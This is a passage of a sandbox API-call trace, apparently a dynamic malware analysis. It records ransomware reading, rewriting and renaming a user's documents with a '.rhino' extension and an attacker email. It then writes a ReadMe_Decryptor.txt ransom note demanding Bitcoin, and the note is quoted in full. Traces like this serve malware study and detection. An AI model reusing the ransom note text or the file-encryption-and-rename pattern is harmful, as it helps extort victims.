Flags=0x0, Size=0x9) returned 0x754280 [0105.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x754298 [0105.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754280 | out: hHeap=0x6d0000) returned 1 [0105.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x75ade8 [0105.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754298 | out: hHeap=0x6d0000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7572e8 [0105.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ade8 | out: hHeap=0x6d0000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72b5e0 [0105.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7572e8 | out: hHeap=0x6d0000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7ab0 [0105.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b5e0 | out: hHeap=0x6d0000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef3d0 [0105.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ab0 | out: hHeap=0x6d0000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x75b988 [0105.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef3d0 | out: hHeap=0x6d0000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75ba20 [0105.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b988 | out: hHeap=0x6d0000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75bb00 [0105.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ba20 | out: hHeap=0x6d0000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75bc48 [0105.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bb00 | out: hHeap=0x6d0000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x729d08 [0105.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bc48 | out: hHeap=0x6d0000) returned 1 [0105.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b988 [0105.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x729d08 | out: hHeap=0x6d0000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x729d08 [0105.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b988 | out: hHeap=0x6d0000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x7a0db0 [0105.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x729d08 | out: hHeap=0x6d0000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x7a1718 [0105.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a0db0 | out: hHeap=0x6d0000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7a2530 [0105.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a1718 | out: hHeap=0x6d0000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7a3a70 [0105.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a2530 | out: hHeap=0x6d0000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7a5a38 [0105.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3a70 | out: hHeap=0x6d0000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x7a0db0 [0105.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a5a38 | out: hHeap=0x6d0000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x7a5500 [0105.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a0db0 | out: hHeap=0x6d0000) returned 1 [0105.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x23b0048 [0105.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a5500 | out: hHeap=0x6d0000) returned 1 [0105.766] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x23ba078 [0105.768] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0105.768] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x23c90b0 [0105.769] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ba078 | out: hHeap=0x6d0000) returned 1 [0105.769] WriteFile (in: hFile=0x118, lpBuffer=0x23c90c0*, nNumberOfBytesToWrite=0xf79f, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23c90c0*, lpNumberOfBytesWritten=0x292f304*=0xf79f, lpOverlapped=0x0) returned 1 [0105.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c90b0 | out: hHeap=0x6d0000) returned 1 [0105.771] UnlockFile (hFile=0x118, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf79f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0105.771] CloseHandle (hObject=0x118) returned 1 [0105.774] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0690 [0105.774] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0105.774] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0690 | out: hHeap=0x6d0000) returned 1 [0105.774] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Z-xFMuafWn712Plg.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8z-xfmuafwn712plg.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Z-xFMuafWn712Plg.rtf.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8z-xfmuafwn712plg.rtf.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0105.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0105.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b800 | out: hHeap=0x6d0000) returned 1 [0105.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a658 | out: hHeap=0x6d0000) returned 1 [0105.780] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77cb68 [0105.780] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77cc18 [0105.780] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x79e148 [0105.780] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cc18 | out: hHeap=0x6d0000) returned 1 [0105.780] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9b50 [0105.780] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x79e148 | out: hHeap=0x6d0000) returned 1 [0105.780] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.781] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0105.781] WriteFile (in: hFile=0x118, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x292f35c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x292f35c*=0x2a4, lpOverlapped=0x0) returned 1 [0105.783] CloseHandle (hObject=0x118) returned 1 [0105.784] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9b50 | out: hHeap=0x6d0000) returned 1 [0105.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a eeK3Cof0F.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a eek3cof0f.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.784] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x6e33 [0105.784] LockFile (hFile=0x118, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x6f53, nNumberOfBytesToLockHigh=0x0) returned 1 [0105.784] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.785] ReadFile (in: hFile=0x118, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0105.849] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.850] ReadFile (in: hFile=0x118, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x6e33, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x6e33, lpOverlapped=0x0) returned 1 [0105.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b9e8 [0105.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x7a26e0 [0105.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7b88 [0105.850] GetLastError () returned 0x0 [0105.850] SetLastError (dwErrCode=0x0) [0105.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a26e0 | out: hHeap=0x6d0000) returned 1 [0105.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6e56) returned 0x7a4db0 [0105.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7b88 | out: hHeap=0x6d0000) returned 1 [0105.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0540 [0105.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75bb98 [0105.852] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0540 | out: hHeap=0x6d0000) returned 1 [0105.852] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b9e8 [0105.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b9f8 [0105.852] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b9e8 [0105.852] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9f8 | out: hHeap=0x6d0000) returned 1 [0105.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b9f8 [0105.852] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b9e8 [0105.852] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9f8 | out: hHeap=0x6d0000) returned 1 [0105.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x754328 [0105.852] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x754340 [0105.852] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754328 | out: hHeap=0x6d0000) returned 1 [0105.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x75b0c8 [0105.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754340 | out: hHeap=0x6d0000) returned 1 [0105.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x757748 [0105.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0c8 | out: hHeap=0x6d0000) returned 1 [0105.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x7a26e0 [0105.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757748 | out: hHeap=0x6d0000) returned 1 [0105.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7b88 [0105.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a26e0 | out: hHeap=0x6d0000) returned 1 [0105.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef438 [0105.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7b88 | out: hHeap=0x6d0000) returned 1 [0105.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x75bd20 [0105.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef438 | out: hHeap=0x6d0000) returned 1 [0105.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75bdb8 [0105.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bd20 | out: hHeap=0x6d0000) returned 1 [0105.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75be98 [0105.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bdb8 | out: hHeap=0x6d0000) returned 1 [0105.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7abc10 [0105.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75be98 | out: hHeap=0x6d0000) returned 1 [0105.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x75bd20 [0105.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7abc10 | out: hHeap=0x6d0000) returned 1 [0105.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x7abc10 [0105.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bd20 | out: hHeap=0x6d0000) returned 1 [0105.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x7ac048 [0105.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7abc10 | out: hHeap=0x6d0000) returned 1 [0105.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x7ac690 [0105.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac048 | out: hHeap=0x6d0000) returned 1 [0105.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x71a658 [0105.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac690 | out: hHeap=0x6d0000) returned 1 [0105.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7abc10 [0105.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a658 | out: hHeap=0x6d0000) returned 1 [0105.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x71a658 [0105.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7abc10 | out: hHeap=0x6d0000) returned 1 [0105.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x71c620 [0105.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a658 | out: hHeap=0x6d0000) returned 1 [0105.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x71f5b8 [0105.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c620 | out: hHeap=0x6d0000) returned 1 [0105.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b0048 [0105.857] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f5b8 | out: hHeap=0x6d0000) returned 1 [0105.857] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x71a658 [0105.857] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0105.857] WriteFile (in: hFile=0x118, lpBuffer=0x71a660*, nNumberOfBytesToWrite=0x6f53, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x71a660*, lpNumberOfBytesWritten=0x292f304*=0x6f53, lpOverlapped=0x0) returned 1 [0105.857] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a658 | out: hHeap=0x6d0000) returned 1 [0105.860] UnlockFile (hFile=0x118, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x6f53, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0105.860] CloseHandle (hObject=0x118) returned 1 [0105.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0690 [0105.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75bd20 [0105.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0690 | out: hHeap=0x6d0000) returned 1 [0105.862] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a eeK3Cof0F.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a eek3cof0f.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a eeK3Cof0F.xlsx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a eek3cof0f.xlsx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0105.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bd20 | out: hHeap=0x6d0000) returned 1 [0105.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bb98 | out: hHeap=0x6d0000) returned 1 [0105.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a4db0 | out: hHeap=0x6d0000) returned 1 [0105.864] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77d038 [0105.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cb68 | out: hHeap=0x6d0000) returned 1 [0105.864] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77cb68 [0105.864] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x79f048 [0105.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cb68 | out: hHeap=0x6d0000) returned 1 [0105.864] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9b50 [0105.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x79f048 | out: hHeap=0x6d0000) returned 1 [0105.864] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0105.865] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9b50 | out: hHeap=0x6d0000) returned 1 [0105.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bfc017GN5tmh.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bfc017gn5tmh.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.865] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x173cb [0105.865] LockFile (hFile=0x118, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x174eb, nNumberOfBytesToLockHigh=0x0) returned 1 [0105.865] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.865] ReadFile (in: hFile=0x118, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0105.867] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.867] ReadFile (in: hFile=0x118, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x173cb, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x173cb, lpOverlapped=0x0) returned 1 [0105.868] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b9e8 [0105.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.868] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x7a26e0 [0105.868] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7b88 [0105.868] GetLastError () returned 0x0 [0105.868] SetLastError (dwErrCode=0x0) [0105.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a26e0 | out: hHeap=0x6d0000) returned 1 [0105.869] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x173ee) returned 0x23b0048 [0105.872] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7b88 | out: hHeap=0x6d0000) returned 1 [0105.872] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0540 [0105.872] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75bb98 [0105.872] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0540 | out: hHeap=0x6d0000) returned 1 [0105.872] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.872] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b9e8 [0105.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b9f8 [0105.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b9e8 [0105.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9f8 | out: hHeap=0x6d0000) returned 1 [0105.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b9f8 [0105.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b9e8 [0105.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9f8 | out: hHeap=0x6d0000) returned 1 [0105.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x754340 [0105.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x754328 [0105.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754340 | out: hHeap=0x6d0000) returned 1 [0105.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x75b0c8 [0105.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754328 | out: hHeap=0x6d0000) returned 1 [0105.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x757748 [0105.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0c8 | out: hHeap=0x6d0000) returned 1 [0105.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x7a26e0 [0105.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757748 | out: hHeap=0x6d0000) returned 1 [0105.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7b88 [0105.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a26e0 | out: hHeap=0x6d0000) returned 1 [0105.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef438 [0105.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7b88 | out: hHeap=0x6d0000) returned 1 [0105.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x75bd20 [0105.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef438 | out: hHeap=0x6d0000) returned 1 [0105.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75bdb8 [0105.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bd20 | out: hHeap=0x6d0000) returned 1 [0105.874] RtlAllocateHeap 